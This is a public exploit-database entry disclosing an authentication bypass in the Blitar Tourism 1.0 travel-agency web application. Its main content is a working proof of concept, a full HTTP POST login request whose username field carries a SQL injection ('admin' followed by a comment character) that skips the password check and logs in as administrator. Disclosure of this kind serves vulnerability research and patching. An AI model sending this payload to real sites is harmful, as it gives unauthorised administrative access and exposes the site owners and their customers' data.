Blitar Tourism 1.0 - Authentication Bypass SQLi

2021.04.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|=========================================================================== | # Exploit Title : Blitar Tourism 1.0 - Authentication Bypass SQLi | | # Author : Ali Seddigh | | # Category : Web Application | | # Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master | | # Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/ | | # Tested on : [ Windows ~> 10 , Kali Linux] | | # Version: 1.0 | | # Date : 2021-04-17 |=========================================================================== POC : POST /travel/Admin/ HTTP/1.1 Host: 192.168.186.132 Content-Length: 49 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.186.132 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.186.132/travel/Admin/ Accept-Encoding: gzip, deflate Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=0nr18qfifjk2f5o4kimk5ca312 Connection: close username=admin%27+%23&password=admin&Login=Log+in |=========================================================================== | # Discovered By : Ali Triplex |===========================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top